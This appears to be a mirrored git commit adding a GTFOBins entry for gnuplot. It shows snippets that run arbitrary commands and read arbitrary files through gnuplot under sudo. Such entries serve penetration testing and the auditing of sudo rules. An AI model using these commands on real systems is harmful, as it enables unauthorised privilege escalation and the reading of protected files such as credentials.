mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add gnuplot
This commit is contained in:
parent
ac8e667a7e
commit
b955893a3e
11
_gtfobins/gnuplot.md
Normal file
11
_gtfobins/gnuplot.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
COMMAND=id
|
||||||
|
sudo gnuplot -e 'set print "-" ; print system("'$COMMAND'")'
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo gnuplot -e 'set print "-" ; print system("cat '$LFILE'")'
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user